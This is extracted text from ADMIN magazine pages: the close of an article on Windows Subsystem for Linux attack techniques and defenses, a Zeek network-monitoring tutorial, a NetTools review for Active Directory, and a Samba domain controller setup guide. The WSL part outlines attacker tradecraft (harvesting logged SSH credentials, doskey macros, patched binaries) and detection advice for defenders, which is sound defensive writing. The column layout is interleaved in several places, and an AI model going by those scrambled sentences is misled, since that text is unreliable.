allowed to use incoming and outgoing SSH requests
WSL, you can as plain text in logfiles. As soon as
rely on command- a Windows user logs in to a remote
line identifiers to computer by SSH, their credentials
track down po- are exposed and logged in WSL.
Figure 2: Even without SSH, macros can be created and redirected tential installation Then, attackers use those credentials
to WSL. activity. for lateral movements.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 59
S EC U R I T Y WSL Vulnerabilities

and utilities from various distributions


into the Windows environment. How-
ever, such a large-scale project inevi-
tably affects safety. Because attackers
are focusing on WSL in their search for
new TTPs, defenders need to establish
appropriate protections. Q

Info
[1] WSL architectures: [https://docs.
microsoft.com/en-us/windows/wsl/
compare-versions#whats-new-in-wsl-2]
[2] Pico processes:
[https://docs.microsoft.com/en-in/
Figure 3: Endpoint Detection and Response (EDR) can help mitigate the threat of WSL archive/blogs/wsl/pico-process-overview]
vulnerabilities. [3] WSL 2 source code of the Linux kernel:
[https://github.com/microsoft/WSL2-
Existing security solutions should might want to disable virtualization Linux-Kernel]
be designed to respond to the use and WSL with the PowerShell cmdlet [4] Linux GUI apps in WSL:
of doskey.exe and the correspond- [https://docs.microsoft.com/en-us/
ing changes in the registry. However, Disable-WindowsOptionalFeature windows/wsl/tutorials/gui-apps]
a patched binary is not so easy to [5] Bashware attack on WSL:
detect right away and would require or the DISM utility. You also can hide [https://www.trendmicro.com/vinfo/us/
the defender to run a check of the the enable or disable Windows Fea- security/news/cybercrime-and-digital-
installed components (rpm -Va) within tures task by setting the NoWindowsFea- threats/bashware-attack-targets-
the WSL distributions. Another tures value in the registry paths to 1: windows-system-for-linux-wsl]
method is to use popular community [6] Custom Linux distributions for WSL:
tools like Rootkit Hunter to identify HKEY_CURRENT_USER\Software\Microsoft\U [https://docs.microsoft.com/en-us/
potentially malicious code. Windows\CurrentVersion\Policies\Programs windows/wsl/build-custom-distro]
HKEY_LOCAL_MACHINE\Software\Microsoft\U [7] Kali in WSL 2:
Windows\CurrentVersion\Policies\Programs
Threat Hunting in WSL [https://www.kali.org/docs/wsl/win-kex/]
NoWindowsFeatures 1 [8] Preview of Linux GUI applications:
The use of WSL in an environment [https://docs.microsoft.com/en-us/
generally looks suspicious if it is not Finally, logging and auditing pro- windows/wsl/tutorials/gui-apps]
one of the usual developer tools. You cesses with tools such as Endpoint [9] Doskey documentation:
will want to monitor the environ- Detection and Response (Figure 3) [https://docs.microsoft.com/en-us/
ment for command lines containing also reduces potential risks. windows-server/administration/
wsl.exe and bash.exe. Additionally, windows-commands/doskey]
DISM or PowerShell used to enable Conclusions [10] OpenSSH: [https://docs.microsoft.com/
WSL or virtualization features can en-us/windows/terminal/tutorials/ssh]
indicate unfriendly behavior. The Windows Subsystem for Linux is a [11] SSH backdoors: [https://blogs.juniper.
You can mitigate WSL threats with useful technology designed to improve net/en-us/threat-research/linux-servers-
optional feature policies, and you productivity by integrating applications hijacked-to-implant-ssh-backdoor]

60 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
S EC U R I T Y Zeek

Network monitoring with Zeek

Light into Darkness


Zeek offers an arsenal of scripts for monitoring popular network protocols and comes with its own policy
scripting language for customization. By Matthias Wübbeling
If you want to know what is hap- at that time) [1], is a kind of hidden Installation
pening on your network, the only champion. The declared objective
way is to look at the connections was to develop a tool for monitoring Normally I use Docker when I try
between devices and to endpoints on large volumes of data with a simple out software. Unfortunately, the
the Internet. Popular tools such as option for analyzing network traffic Zeek developers do not provide
tcpdump and Wireshark are useful for with self-programmed scripts, known their own Docker images, so my
occasional analysis, but for perma- as policy scripts. The name change options were to find an alternative
nent network monitoring and as an to Zeek (think “seek”) didn’t happen provider or create an image myself
alternative to intrusion detection sys- for another 20 years or so. from the Dockerfiles they provided.
tems, Zeek is a very interesting tool. Zeek offers an extensive arsenal of You will need to allow some time
scripts for monitoring the popu- for the Zeek build process.
Network Monitoring lar network protocols and writing The OpenSUSE Build Service is a
the monitoring results to various faster approach. Developers of-
Keeping track of device activity on logfiles on your hard drive. From fer ready-made packages there for
the network is a routine task for IT there, you can integrate the files the classic Linux distributions [2].
administrators. Network monitoring into your existing log management With your distribution’s package
Photo by Susann Schuster on Unsplash

is a large market comprising various or your installed security informa- manager, you can mount the re-
tools, and vendors outdo each other tion and event management (SIEM) quired repository and install Zeek
with feature set claims, especially solution. The log data is com- in the usual way. Of course, you
in the area of event processing and pressed and archived at regular in- can run your distribution in its own
manual analysis. tervals, which is an effective way to Docker container, too. To do this,
Zeek, the first version of which was save disc space, especially on busy start an Ubuntu container with the
released back in 1999 (known as Bro networks. command:

62 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Zeek S EC U R I T Y

docker run -ti --net=host U already listening in the background Now, with the deploy command
--name=zeek ubuntu:latest U on TCP port 47760, which is used used earlier, restart the Zeek process
/bin/bash by Zeek. and check the format in the logfiles.
Now type exit to quit the manage- For further analysis of your log data,
The --net=host argument gives the ment tool and begin to generate you can also connect tools that ex-
container direct access to the host network traffic on the host. You can pect input in JSON format.
system’s network interfaces, which it watch new logfiles appearing in
will need to read all the traffic on the the /opt/zeek/logs/current folder. Conclusions
interface. The --name=zeek argument The first file created here is conn.
explicitly names the container and log, which simply lists all network For administrators, reliable in-
makes connecting with the container connections. The list grows quickly, sights into network traffic are a
easier later on. Before you follow the and files dns.log, dhcp.log, and ntp. must-have. They not only help you
instructions for installing Zeek [2], log give you an initial idea of which identify and analyze problems, but
first use the command logs Zeek pre-filters for you in the detect possible attackers. Zeek can
background. already look back on more than 20
apt update && apt install U If you run a DHCP server on your years of development, delivering
-y sudo curl gnupg vim net-tools network and after some time use cat a classic approach to monitoring
to display the content of the dhcp.log network activity. The tool comes with
to install the dependencies in the run- file, you will see requests from differ- its own policy scripting language [3]
ning Ubuntu container. ent network devices and the assigned for customization. With its help,
IP addresses. If you open a web page, you can flexibly adapt your moni-
Configuration and Start-Up for example, with the toring setup to suit your needs or
expand the analysis options to
Fortunately, you do not need to con- curl https://www.admin-magazine.com include more network protocols, if
figure Zeek extensively before using required. Q
it for the first time: Just specify the command, you will then see an entry
name of the network interface on in both the dns.log and the http.log
which you want to monitor the traf- files. However, because Zeek cannot Info
fic. Of course, running the server with resolve TLS connections, you will [1] Paxson, V. Bro: A System for Detecting
Zeek on a mirror port of your router find most calls to web pages in the Network Intruders in Real-Time. Computer
or switch is a good idea. All data ssl.log file. Networks, 1999;31(23-24):2435-2463,
packets that are transmitted are also If you let Zeek run for a little while [https://www.icir.org/vern/papers/
transferred to the mirror port. longer during your day, you will bro-CN99.pdf]
Assuming the interface on this port notice that it keeps archiving the [2] Zeek packages:
is named eth1, you can configure the files. Each day will have a folder [https://software.opensuse.org//
interface and the host name in the with the matching date in /opt/zeek/ download.html?project=security:zeek&
respective line of the /opt/zeek/etc/ logs. Look for the weird.log file in package=zeek]
node.cfg file: the archive subfolders, also with the [3] Policy scripts:
corresponding dates and compressed [https://docs.zeek.org/en/master/
[zeek] by gzip. If you unzip these files and scripting/basics.html]
type=standalone take a look at the content, you will
host=localhost see that these logfiles contain unusual The Author
interface=eth1 events, such as the reuse of existing Dr. Matthias Wübbeling is an IT security en-
connections or errors in UDP and TCP thusiast, scientist, author, consultant, and
Now run the management tool checksums. speaker. As a Lecturer at the University of
zeekctl, install the supplied policies, Bonn in Germany and Researcher at Fraunhofer
and launch Zeek with: Converting Logs to JSON FKIE, he works on projects in network security,
IT security awareness, and protection against
/opt/zeek/bin/zeekctl To make the log data easier to handle, account takeover and identity theft. He is the
[ZeekControl] > deploy you can change the tab-delimited log- CEO of the university spin-off Identeco, which
ging to a more modern JSON format. keeps a leaked identity database to protect
The output should show the com- To adapt the configuration, add the employee and customer accounts against iden-
mand workflow. If you see an error following two lines to your /opt/zeek/ tity fraud. As a practitioner, he supports the
message, you can use the Zeek diag share/zeek/site/local.zeek file: German Informatics Society (GI), administrat-
command to discover why. Check ing computer systems and service back ends.
the name of the network interface # Output in JSON format He has published more than 100 articles on IT
and make sure a process is not @load policy/tuning/json-logs.zeek security and administration.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 63
M A N AG E M E N T NetTools for AD

Active Directory management with NetTools

Health Check
NetTools utilities extract information from Active Directory to help admins simplify troubleshooting and
administration. By Klaus Bierschenk
Active Directory administrators and helps you find your way around. simplifies getting started with the GUI
have a massive choice of tools, start- A list of all functions and a carefully and includes instructions on how to
ing with the integrated administra- maintained blog round off the infor- handle the profiles.
tion tools on Windows Server and mation collection. The author offers
including a variety of free and com- readers tips and tricks for the utilities, Integrated GUI Functions
mercial programs. This toolbox can accompanied by plenty of examples.
be nicely rounded off with the free NetTools starts exactly where the on- The NetTools feature set is not just
NetTools: in total, more than 90 utili- board tools leave off. Therefore, it is the individual tools lined up ready for
ties that simplify troubleshooting and not intended to be an alternative to use on the left side of a GUI. Useful
administration. existing tools, but deliberately closes elements are also embedded directly
NetTools [1] notches some initial functional gaps. in the GUI (e.g., in the context menus
brownie points directly after you of the objects). Taking a user object
download its single EXE file. You Targeted Profiles as an example, you can easily search
don’t need to install a tool palette, for it by typing the name or part of it,
with no dependencies on frameworks By default, you work with the tool- without wildcards, in the search bar
or DLLs. However, this doesn’t trans- box in the context in which you have at the top of the screen. The results
late to a hodgepodge of command- logged on. For more flexibility, you appear in the main window, and from
line tools; instead, everything is can create profiles that include both this list you can select an element by
available in a central management connection data for a specific domain right-clicking. The treasure trove of
interface without the need for con- controller, or even a different domain, information in the context menu is a
text changes. The only add-on is an along with the user account. A profile revelation for any admin.
INI file with work files for the cur- can be specified in the course of a Last Logon, for example, shows de-
rent configuration and user-specific specific action, which means you do tailed information about the respec-
information. If nettools.ini does not not need to be interactively logged tive object: When and how often
exist, it is created at program launch in as a domain admin to act in the did the user log in recently? Which
time. Software can be that simple and context of the domain admin’s au- domain controller processed the
Photo by Hush Naidoo Jade Photography on Unsplash

makes installation on a domain con- thorizations. All profile information login? Was the password entered in-
troller less critical because it avoids is stored in the INI file – except for correctly? When was it last changed?
any risk of trouble with components the passwords. The passwords are The Use With menu has even more
installed at the same time. not stored anywhere but need to be to offer: The Group Changes subi-
On the website you can look for- retyped each time. tem gives you information on the
ward to some very good and, above Even at first glance, the tools’ graphical history of group assignments in ad-
all, up-to-date documentation – not user interface (GUI) is neat and tidy dition to group memberships. You
necessarily a matter of course in the and the buttons are self-explanatory. can easily see when a user has been
world of freeware. The FAQ section For newcomers, it is still advisable to removed from or added to a group,
is helpful, especially for newcomers, consult the help on the website, which for example. The various options in

64 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
NetTools for AD M A N AG E M E N T

the context menu invite admins to The developer chose this symbolism Connection Check
browse and try them out. to illustrate the several possibilities.
Clicking on the * shows hints about
Between DCs
Finding Differences the different symbols; what’s more, Domain controllers (DCs) maintain
you have the option to select a filtering active communication with each
Comparing two objects is a fairly character for the display, which means other. For this reason, it can be chal-
common scenario. Staying with the you can reduce the list to elements of lenging when firewall rules do too
user object, I will look at an example the objects that are identical or pre- much of a good thing – especially
related to permissions in Active Direc- cisely not identical. between remote sites – and important
tory. A comparison in NetTools al- ports are closed. The resulting error
ways involves two steps: First, select Other Options for patterns are difficult to interpret and
an element from the list of users (or usually show up in completely differ-
other objects), again using the con-
Comparisons ent places. A function integrated into
text menu, this time with the menu Comparisons often help during trou- NetTools tests the connectivity be-
item Select left SD to compare (where bleshooting group memberships, as tween domain controllers and, in the
SD stands for security descriptor, the well. How do two user accounts differ event of individual errors, displays
place where permissions are stored in terms of their group memberships? them at the port level. Admittedly,
for a user object). To find out, the procedure is simi- the Test-NetConnection cmdlet does
After selecting the option, the GUI re- lar to what you just saw. This time, the same job, but it is not as nicely
members the object. In this example, choose Use With | Group Compare. integrated into a GUI. All of the ports
assume you have selected the Christa The memberships are listed, and you important for AD communication are
user account. Now you can display can see directly what is going on in already included. You also have the
the second object with another search. relation to two objects. option of specifying individual ports
If you open the context menu again, These examples are just a few that that will be included in the test.
you will see the Compare to ‘Christa’ show how useful functions are inte- Staying with the network, in terms of
SD item. A new window then shows grated into the view and the context site topology, correct mapping of sub-
the differences between the two user menu. A lot more is waiting, though. nets, the site, and the domain control-
objects in tabular form. This view For example, you can see whether a ler is immensely important. Among
contains a column header at the top. conflict exists with accounts in an- other things, mapping ensures that
Worth noting is the column with the other domain from the email address computers can find their DC. If parts
asterisk (*) header (Figure 1) that of a user account (e.g., as a check cri- of an IP address range are assigned
shows the results of comparisons terion before migrating the account). to multiple subnets, overlapping sub-
between values in the columns as spe- A look at not only user objects but nets occur, which can lead to issues
cial symbols, allowing you to identify also computer accounts in the context that are difficult to track. Although
whether permissions are identical, menu of an object is definitely very this situation is not an immediate
partially identical, or not available for helpful if you want to discover the threat, unnecessary network traffic
comparison for one of the two objects. full potential. can try users’ patience; after all, you

Figure 1: Two objects compared: Smart symbols help you identify differences.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 65
M A N AG E M E N T NetTools for AD

probably want each computer to com- including one or more DCs, or just a The AD Replication | Domain Changes
municate with the closest DC. The certain number of GPOs, in the test. option is somewhat simpler, but just
Overlapping Subnets function, which as helpful. After specifying a domain
can also be found in the sidebar, is Monitoring Replication controller, replication information is
where the subnets and the respective returned if a change has occurred. If
masks are calculated and overlaps are Replication, and therefore the distri- you want to know how long it takes
displayed. You do not have to specify bution of changes in Active Direc- for changes in a partition to replicate,
a network range, because the function tory, is one of the directory service’s Replication Latency is the right place
accesses the subnet information of most important functions and is to look. To begin, you need to specify
the topology and calculates possible especially true for infrastructures the DN of an object; it is then created
overlaps. whose sites and domain controllers and deleted again. Both write pro-
provide services, although they are cesses can be monitored in terms of
Replacement for GPOTool physically remote from each other. time. In this way, comparisons can be
Unfortunately, inconsistencies in syn- made and any weak points in regional
Some of you might remember the Win- chronization can cause very unpleas- network connections can be located.
dows Server 2003 Resource Kit, which ant glitches, with a wide variety of Depending on the application sce-
included a tool named GPOTool.exe that causes. The network, domain name nario, you can use the tool that best
inspected and tested group policies. system (DNS), or even policies can suits each case. The current 1.31
However, Microsoft did not provide a sometimes interfere. NetTools comes version of the toolbox contains 10
replacement for this feature after the with a number of features in the AD functions that offer versatile views
resource kit was discontinued. Luckily, Replication section that can help shed of replication, which is all the more
NetTools has a similar function named a light on this problem. valuable because the on-board tools
GPO Explorer. The monitoring functions range from have little to offer in this regard.
After launching the tool, you are health checks for a site to analyzing
taken to an overview of the state of replication at the attribute level. The LDAP Directory Without
group policy objects (GPOs), which Attribute Replication function (Fig-
initially appears to be similar to the ure 2) lets you look into the details.
the Frills
Group Policy Management Console To do this, you need to specify the NetTools enables versatile access to
(gpmc.msc). A closer look reveals small distinguished name (DN) of the ob- LDAP directories with various LDAP
but subtle differences. With just a few ject to be examined. A detail window functions. The focus is on Active
clicks, you can view assigned GPOs, then shows the attributes of the ob- Directory, but you are not restricted
output their contents by scrolling and ject, along with a list of domain con- to AD as long as the directory you
switching between policies, and more. trollers in the left-hand section. After want to access follows the LDAP
A Test button lets you test a single you decide which of the DCs need to API standard. An LDAP browser
GPO. Alternatively, you can select the take part in the comparison, pressing delivers directory information in the
node with the domain name up front Compare displays the attribute con- form of raw data, unlike the Active
to check the entire environment by tent for each DC. Directory admin tools that prettify

Figure 2: Help with troubleshooting: Attribute Replication checks whether identical object information exists on several DCs.

66 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
NetTools for AD M A N AG E M E N T

data here and there and validate to light. New queries are quite easy to you can also display other content such
user input before making changes. create by editing existing queries and as the object attributes.
For example, the LDAP Search func- then adding the modified versions to Much more awaits you in NetTools.
tion integrated into NetTools sup- the catalog. The ability to import and The information is integrated in the
ports SSL-based access, and even export LDAP statements via the clip- Properties dialog and varies as a
write access is possible without board rounds off the feature set, leav- function of the type of object you
leaving the client. ing virtually no wishes unfulfilled. are viewing. For a user account, for
An admin does not need any knowl- The option to write the output to files example, you also have the option of
edge of LDAP syntax. The query crite- means that you are not restricted to displaying the last password change
ria are created in the GUI with the use the GUI in the tool but can process date, the Fine Grain Password Policy
of drop-down lists (Figure 3). More the info downstream (e.g., in Excel). if applicable to the user, or which
than 280 predefined LDAP queries are domain controller the user logged in
found under Favorites, which is very Advanced View 2.0 with and how often they did so. This
useful. Besides illustrative material, information can help narrow down
you’ll find a number of useful tools Like the standard Users and Computers individual issues.
for practical admin work. console (dsa.msc), you can also use the
Most administrators will be really various NetTools functions to display Checking Groups for
excited to see the catalog of LDAP object properties. You are probably
queries. Do you need a list of groups aware of the advanced display variant
Changes
without members? Do you want to in dsa.msc if you enable the Advanced Previously you looked at the group
know which GPOs were modified in Features in the View menu. The Prop- membership history starting with a
the last 10 days? Predefined queries erties dialog for a user account still user object. This view also works in
bring this information and far more provides the basic info in this case, but the other direction – that is, starting

Figure 3: Like the cockpit of an airplane, the LDAP client comes with a plethora of settings.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 67
M A N AG E M E N T NetTools for AD

with a group. To find out what Schema – Under the Hood some other format, including 64-bit.
changes have been made, for ex- This function certainly is not used
ample, in the Domain Admins group, Administrators are pretty sure to be on a daily basis, but if you ever need
you need to view the group in one of familiar with the history and updates it, it is reassuring to know it can be
the NetTools views. The easiest way of their schemas; after all, this is found in the toolbox.
to do this is to use the search box “their” Active Directory and the info
at the top of the toolbar. Uncheck is essential. What happens, though, if Conclusions
Return Users Only; otherwise, the you need to investigate the schema,
search will fail. You also need to pay versions, and update history of some- When you work with NetTools, it
attention to the spelling of the group one else’s AD? The functions in the becomes clear what a wealth of in-
names. In this case, one AD domain Schema category can be helpful. The formation Active Directory offers.
controller was a German server; Schema Versions item helps you find Experienced administrators who
accordingly, the group name was out what changes have been made to have managed without NetTools so
Domänen-Admins (Figure 4), but the schema, for both the Active Direc- far will have loads of fun with it.
this is just a side note. tory and Exchange schemas. Schema You will be surprised to see the bou-
To find out what activities have taken History takes this one step further and quet of utilities that squeeze the last
place in this group, navigate to the shows you the schema history (i.e., snippet of information out of Active
context menu by right-clicking and when which update was made to the Directory.
then selecting AD Properties. In the schema). Great attention has been paid to
Properties, focus on the Members In addition to the quite extensive detail in the functions themselves,
tab to view the current members of NetTools functions, a number of mi- which definitely helps in daily opera-
the group. Unlike in the Users and nor functions can brighten up your tions. Despite all the praise, people
Computers console, the Removals everyday life as an administrator. are bound to look for things that
field here already displays the latest For example, the unique security could be improved, and for the many
accounts to have been removed from identifier (SID) of an Active Direc- admins who like to avoid mouse
the group. You can go into even more tory object or the name of a SID is pushing, a call for a command-line
detail by pressing the Changes but- displayed by the SID converter. You interface might be justified, consider-
ton. Another window provides data have probably viewed the event log ing NetTools sees itself as a purely
on when accounts were added and of a domain controller that revealed GUI-based tool. Q
removed. a problem with a user that had a
In this context, I need to mention SID of 123 et cetera, but who is this
once again the LDAP catalog, with its user? Of course, you have Power- Info
diverse query options. It also includes Shell cmdlets or the wmic userac- [1] NetTools: [https://nettools.net]
queries relating to group administra- count command with the get sid or
tion, especially for administrative get name parameters, but it’s good to
groups. Note also that the group know that NetTools has a converter, Author
names in the queries might need to especially if you are working in the Klaus Bierschenk is an Executive Consultant
be adjusted to match the language of NetTools GUI and with identities at CGI Germany, a speaker at conferences and
the domain controller. The LDAP que- anyway. community events, and technical author of
ries are all based on the built-in group Speaking of converters: The Time various publications. You can find him on his
names in English. Converter lets you convert a time to blog http://nothingbutcloud.net/.

Figure 4: Group Changes lets you track the latest group changes for a user account.

68 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
M A N AG E M E N T Samba AD Domain Controller

Samba domain controller in a heterogeneous environment

Shake a Leg
server as the domain controller. In
The open source Samba service can act as an Active Directory domain
version 4, Samba itself could as-
controller in a heterogeneous environment. By Andreas Stolzenberger sume the domain controller role.
The implementation also supports
An Active Directory (AD) domain Internet File System (CIFS) protocols. mixed operation of Windows and
controller (DC) serves as a central Version 4 of the well-known open Linux servers as DCs. Of course, us-
logon server in heterogeneous net- source Samba file service, on the ers with an existing Windows server
works with Windows, Linux, and other hand, provides a complete DC infrastructure will not want to swap
macOS clients. This task does not implementation. their systems for Samba servers.
necessarily have to be handled by a The Samba project has been around Rather, the solution is recommended
Windows server. The open source for some 30 years now. It started life for environments that use Windows,
Samba service can also act as a DC. as a free Unix client for DEC Path- macOS, and Linux on the client
Heterogeneous networks with servers works, which was partly based on side but run their server services on
and clients running both Linux and the technology of the IBM OS/2 LAN Linux systems. In this scenario, a
Windows need a centralized manage- Server and Microsoft LAN Manager. In Samba server serves as a central di-
ment server for the user directory and the 1990s and early 2000s, the open rectory service for Windows, macOS,
a standardized protocol for network source project initially fell foul of Mi- and Linux systems, as well as a file
shares. Windows systems naturally crosoft, with repeated disputes. When server for all.
prefer Active Directory for this pur- Microsoft revamped its “Linux is
pose, but technologies such as Kerbe- cancer” (Steve Balmer) stance to “Mi- Installing Samba 4
ros and Lightweight Directory Access crosoft loves Linux” (Satya Nadella),
Protocol (LDAP) for securing user and the software giant’s relationship to A directory server hosts a whole
access rights are open source. The the open source project changed. Mi- range of services and protocols such
obvious choice would seem to be the crosoft employees have been part of as domain name system (DNS),
open source FreeIPA directory server. the Samba development team since Kerberos, and LDAP. Samba inte-
Photo by Zachary Nelson on Unsplash

However, FreeIPA mainly targets 2011. Additionally, Microsoft has now grates all services to ensure they
Linux systems and user and group openly documented the SMB protocol, work together optimally in the Ac-
management. which helps Samba developers. tive Directory Service (ADS) DC.
FreeIPA lacks some features needed Since Windows Server 2003, a Samba Other products such as FreeIPA, for
to act as a DC that a Windows sys- server can become a member of an example, are made up of various
tem provides over the Server Mes- existing AD forest. However, this components such as MIT Kerberos,
sage Block (SMB) and Common setup always required a Windows OpenLDAP, and Bind9. However,

70 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Samba AD Domain Controller M A N AG E M E N T

complete integration of the libraries Debian (Armbian) minimal setup If you want your Samba server to
into the Samba ADS package causes with a static IP address and the cor- manage advanced access authoriza-
problems for various distributions. rect configuration of /etc/hostname tions (access control lists, ACLs),
The Fedora and Enterprise Linux and /etc/hosts. The first computer the server’s filesystem must allow
(EL) distributions rely on MIT Ker- with ADS also assumes the role of extended attributes, which are al-
beros and ship with its packages the DNS server. If you already have a ways enabled on modern Linux
in place. (“EL” includes all Linux Dynamic Host Configuration Protocol installations with XFS or Btrfs. This
distributions that are clones of Red (DHCP) service running on the local setup is now also the standard for
Hat Enterprise Linux, such as Alma area network (LAN), it must point to ext4 filesystems. If you are using
or Rocky Linux and CentOS Stream.) the IP address of the ADS as the DNS ext4, you can check /boot/con-
Unfortunately, this approach still (DHCP option 6) and transmit the fig-<current kernel> to make sure
does not work correctly in ADS domain name (DHCP option 15). the required settings are in place
mode. A TechPreview build of the During the install, the primary ADS before you install:
Samba server that includes MIT node must be able to access your
Kerberos is not currently considered existing DNS server, but you can CONFIG_EXT4_FS_POSIX_ACL=y
stable. Samba prefers the “Heimdal” change the DNS setup after the CONFIG_EXT4_FS_SECURITY=y
implementation of Kerberos for the initial setup (Figure 1). As with all
AD service. A Samba ADS can only other services that use encryption, Now set up the required packages on
be set up on Fedora and EL distribu- the correct system time is essential. your Debian server:
tions if you use workarounds that On an ADS network, the domain
require either third-party repositories controller also acts as a time source apt install samba samba-vfs-modules U
or a Samba build from source code. for its clients. Before the install, first samba-dsdb-modules
For this reason, I used two Debian make sure that the server’s system smbclient winbind libpam-winbind U
variants in the test setup: the current time and time zone match and that libnss-winbind
Debian 11 on a virtual machine and a service such as Network Time Pro- krb5-kdc libpam-krb5 -y
an ARM CubieTruck single-board tocol (NTP) or Chrony ensures auto-
computer with Armbian 5.9, which matic time synchronization with the The basic Samba installation comes
is based on Debian 10. In smaller en- Internet. This detail is especially im- with a configuration file as a tem-
vironments, a single-board computer portant in a setup with an ARM sin- plate. However, the ADS setup creates
of this class (ARM V7 dual core, 2GB gle-board computer because systems a new one, so you need to remove the
of RAM) is fine as an ADS. In prepa- like a Raspberry Pi or CubieTruck do old one by typing
ration, the machines need a standard not have a hardware clock.
rm /etc/samba/smb.conf

before you proceed with the setup.


The Samba tool then guides you
through the AD setup with:

samba-tool domain-provision --interactive

Without any further parameters, the


Samba tool relies on Samba’s inter-
nal services for all required services
(DNS, Kerberos). When prompted,
enter the domain and realm name
information. Another important item
to enter is your existing DNS server
as the forwarder (Figure 2). Finally,
the setup creates the appropriate
configuration files and a registry. The
smb.conf file immediately creates the
setup in the correct directory. The
Kerberos configuration, on the other
hand, needs to be copied manually to
the correct directory by typing
Figure 1: Use the standard AD tools on Windows to customize the domain settings of the
Linux DC. cp /var/lib/samba/ private/krb5.conf /etc/

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 72 71
M A N AG E M E N T Samba AD Domain Controller

host -t SRV _ldap._tcp.<Domain Name>

must respond with has SRV record 0


0 389 <FQDN of the DC>, whereas a
regular DNS request to the Internet is
answered by the forwarder with, for
example, www.admin-magazine.com
has address <IP-Address>.
Errors in the DNS are some of the
most common causes of directory
setup problems. Whatever else hap-
pens, this service must work correctly
in your environment.

ADS Management at the


Command Line
The Samba tool used previously can
do more than just guide you interac-
tively through the AD setup. It also
acts as a command line interface
(CLI) for AD management that man-
Figure 2: The Windows DNS Manager manages the DNS zones of the forest. The Linux DC ages users and group memberships
servers synchronize their settings. easily. Before you can work with the
Samba tool, you first need to log in
Samba provides a separate binary for The local DNS resolver therefore also as an administrator and manage the
AD operation. To prevent the regular needs to point to the local system. directory:
Samba services from running or being Modern distributions use the sys-
started accidentally, enter: temd-resolved service, which detects init Administrator
network changes and dynamically samba-tool user create hammer IamAgenius
systemctl stop smbd nmbd winbind adjusts the DNS configuration by samba-tool group addmembers ncc1701 hammer
systemctl disable smbd nmbd winbind overwriting the /etc/resolv.conf file
systemctl mask smbd nmbd winbind as needed. This service is needed by The practical thing about the CLI
users on clients that frequently switch method is that standard tasks can
and, instead, use the AD server LANs or establish VPN connections. be handled by script. A simple Bash
service: The domain controller in this ex- script could read the DNS configura-
ample, on the other hand, requires a tion of an existing /etc/hosts file and
systemctl unmask samba-ad-dc static DNS configuration, which you transfer these hosts to the AD-inte-
systemctl start samba-ad-dc can achieve by turning off the sys- grated DNS with samba-tool dns add.
systemctl enable samba-ad-dc temd-resolved service and unlinking
the resolv.conf file: Adding Clients
which integrates all services.
systemctl stop systemd-resolved Before you add a client to AD, you
systemctl disable systemd-resolved need to verify that its DNS configu-
Checking the DNS Service
cd /etc ration points to the DC server. This
Once the Samba AD server is run- unlink resolv.conf example deploys Windows 10 En-
ning, it assumes the DNS role for terprise and Windows Server 2022.
the network. On the DC system In an editor of your choice, create a Windows 10 Enterprise version 21H2
itself, you now need to configure lo- new /etc/resolv.conf with only two does not have the Join a domain
cal DNS resolution. The Samba tool entries: button that previous Windows ver-
has added your existing DNS server sions had in system Settings. You
to the configuration in /etc/samba/ nameserver <IP address of the DC> need to work your way through the
smb.conf: search <domain name> following menus in Windows: Start
| Settings | System | About | Rename
[global] Next, check that both a local and this PC (advanced). In the System
dns forwarder = <DNS IP address> forwarded DNS request work. The Properties dialog, press Change and
... command enter the name of your domain in

72 A D M I N 72 W W W. A D M I N - M AGA Z I N E .CO M
Samba AD Domain Controller M A N AG E M E N T

the Member of Domain box. Now dnf install realmd sssd oddjob U Adding a Second DC
Windows asks for a user with the oddjob-mkhomedir adcli U
domain join permission. Simply samba-common-tools -y Of course, one DC should not man-
enter Administrator with the appro- age a network alone, so you need
priate password and the system will If needed, adjust the DNS configura- to add at least one more DC. It is
become part of the domain. After re- tion in systemd-resolved as described also considered best practice for
starting, you can log in to the Win- previously. Make sure the configura- DCs not to provide file shares but
dows client as one of the previously tion is correct and the Fedora client devote themselves to their tasks as
created users. can contact the DC: domain controllers. Regular domain
If you want to use the GUI tools for member servers without DC func-
AD administration on this Windows realm discover <Domain-Name> tions then host the filesystem shares
client, you can download them from – but more on this later. Setting up
Microsoft [1]. Windows Server 2022 If you do not get an error message additional AD servers follows the
provides the appropriate tools. The here, add the Linux client to the same pattern as for the AD: Set up
DS-Client setup works in a similarly domain: the packages, delete smb.conf, check
simple way on Linux systems. Dif- the DNS configuration, and adjust
ferent Kerberos versions for the cli- realm join <Domain-Name> -v if necessary. On another DC server,
ents have no compatibility issues as run the Samba tool:
long as they use AD for login verifi- The -v switch prints all the details of
cation and do not run a local Samba the operation on the CLI. At the end samba-tool domain join <domain-name> DC U
service. EL and Fedora systems can of the process, Successfully enrolled -U"Administrator@<domain-name>"
join the domain just like Debian machine in realm confirms joining
systems. On a Fedora 36 worksta- the domain. Now you can log in to The tool will then prompt you for
tion, the first step is to install the the Linux GUI or CLI as with a do- the admin password and perform the
necessary packages: main user. AD setup. Afterward, disable and
M A N AG E M E N T Samba AD Domain Controller

comment out the regular Samba ser- Doing so specifies that Winbind [global]
vices as on the first DC, enable the uses ADS to query the users. config backend = registry
samba-ad-dc service instead, and To ensure that the local system also
apply the Kerberos configuration. uses Windbind to determine users In this case, Samba ignores the com-
and their IDs, you also need to mod- plete content of the smb.conf file and
Becoming a Domain Member ify the /etc/nsswitch.conf file. The reads the information from the regis-
entries for passwd and group should try only. In many cases, this method
If you specify look something like: is too strict, which is why you have
two other options:
samba-tool domain join U passwd compat winbind
<Domain Name> MEMBER group compat winbind include = registry
registry shares = yes
instead of DC, the system only joins The Linux system will then first
the domain as a member and not as search the local passwd and group The first option evaluates the com-
a domain controller. However, this files for users and groups, along plete smb.conf file plus the registry
does not always work flawlessly or with their IDs. If it doesn’t find any- entries, and the second option only
with all distributions. The some- thing there, it fetches the informa- reads information about shares
what more complex way, which tion from the domain via Winbind. from the registry. Therefore, you
also works with other distributions In an AD client setup, for example, can only change the shares, but not
such as Fedora or EL, uses a manual sssd is displayed here instead of the basic server configuration in the
configuration. winbind. Now you can register the registry.
